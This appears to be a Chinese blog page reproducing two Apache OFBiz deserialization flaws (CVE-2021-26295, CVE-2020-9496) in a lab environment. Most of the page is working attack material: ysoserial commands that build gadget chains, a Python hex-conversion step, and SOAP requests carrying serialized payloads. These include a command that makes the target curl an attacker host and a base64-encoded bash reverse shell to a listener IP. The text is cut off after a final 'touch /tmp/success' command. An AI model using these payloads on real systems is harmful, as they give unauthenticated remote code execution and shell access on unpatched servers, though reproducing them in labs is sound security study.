Tag:CVE-2020-9496

Tag (CVE-2020-9496)'s result:

apache ofbiz 两个反序列化漏洞重现(CVE-2021-26295和CVE-2020-9496)

0x00 概述 OFBiz是基于Java的Web框架,包括实体引擎,服务引擎和基于小部件的UI,是一个电子商务平台,用于构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类应用系统。 CVE-2021-26295:RMI反序列化命令执行,未经身份验证的攻击者可以成功接管Apache OFBiz。 CVE-2020-9496:xmlrpc未授权反序列化导致RCE。   0x01 影响范围 CVE-2021-26295:Apache OFBiz < 17.12.06 CVE-2020-9496:Apache OFBiz < 17.12.04   0x02 漏洞重现 app=”Apache_OFBiz” CVE-2021-26295 docker run -d -p 8000:8080 -p 8443:8443  opensourceknight/ofbiz   POST /webtools/control/SOAPService HTTP/1.1 …… Content-Type: application/xml   <soapenv:Envelope xmlns:soapenv=”http://schemas.xmlsoap.org/soap/envelope/”> <soapenv:Header/> <soapenv:Body> <ser> <map-HashMap> <map-Entry> <map-Key> <cus-obj>ace……e78</cus-obj> </map-Key> <map-Value> <std-String value=”http://xxxxxx.dnslog.cn”/> </map-Value> </map-Entry> </map-HashMap> </ser> </soapenv:Body> </soapenv:Envelope> 中间的cus-obj 直接用: java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all-brianwrf-fork.jar URLDNS http://ofbiztest.xxxxxx.dnslog.cn > ofbizhex.out 然后转成hex 即可: import binascii filename = ‘ofbizhex.out’ with open(filename, ‘rb’) as f: content = f.read() print(binascii.hexlify(content))   RCE java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all-brianwrf-fork.jar ROME ‘curl http://192.168.56.200:7766/testofbizrce’ > b2h10.txt   POST /webtools/control/SOAPService HTTP/1.1 …… Content-Type: application/xml   <soapenv:Envelope xmlns:soapenv=”http://schemas.xmlsoap.org/soap/envelope/” xmlns:ser=”http://ofbiz.apache.org/service/”> <soapenv:Header/> <soapenv:Body> <ser> <map-Map> <map-Entry> <map-Key> <cus-obj>aced00057……00678</cus-obj> </map-Key> <map-Value> <std-String/> </map-Value> </map-Entry> </map-Map> </ser> </soapenv:Body> </soapenv:Envelope>     反弹shell java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all-brianwrf-fork.jar ROME ‘bash -c {echo,YmFzaCAtYyAnZXhlYyBiYXNoIC1pICY+L2Rldi90Y3AvMTkyLjE2OC41Ni4yMDAvNzc2NiA8JjEn}|{base64,-d}|{bash,-i}’ > b2h11.txt   POST /webtools/control/SOAPService HTTP/1.1 …… Content-Type: application/xml   <soapenv:Envelope xmlns:soapenv=”http://schemas.xmlsoap.org/soap/envelope/” xmlns:ser=”http://ofbiz.apache.org/service/”> <soapenv:Header/> <soapenv:Body> <ser> <map-Map> <map-Entry> <map-Key> <cus-obj>aced00057……000678</cus-obj> </map-Key> <map-Value> <std-String/> </map-Value> </map-Entry> </map-Map> </ser> </soapenv:Body> </soapenv:Envelope>   CVE-2020-9496 环境:https://vulhub.org/#/environments/ofbiz/CVE-2020-9496/ https://192.168.56.200:8443/myportal/control/main https://192.168.56.200:8443/webtools/control/xmlrpc   java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all-brianwrf-fork.jar CommonsBeanutils1 “touch /tmp/success”……